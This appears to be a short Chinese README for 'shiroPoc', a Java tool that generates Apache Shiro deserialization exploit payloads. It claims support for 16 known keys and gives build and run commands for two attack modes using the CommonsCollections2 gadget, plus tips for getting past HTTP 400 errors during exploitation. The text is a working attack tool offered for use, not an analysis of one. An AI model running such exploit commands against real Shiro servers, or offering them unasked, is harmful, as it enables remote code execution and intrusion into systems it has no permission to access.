mvn package 编译
payload来自雷石安全实验室的ShiroExploit,再次感谢雷石安全实验室,雷石安全实验室牛逼plus
支持shiro 16个key,支持攻击利用。支持的key与gadget以及攻击类型如下
该攻击类型为XraySysProp,使用方法如下
java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XraySysProp
利用截图如下
该攻击类型为XrayCmd 使用方法如下
java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XrayCmd
利用截图如下
- 建议删除不相关的http请求头,不然会因为http请求头过大而提示400错误
- 建议使用CommonsCollections2 gadget,体积小,利用率高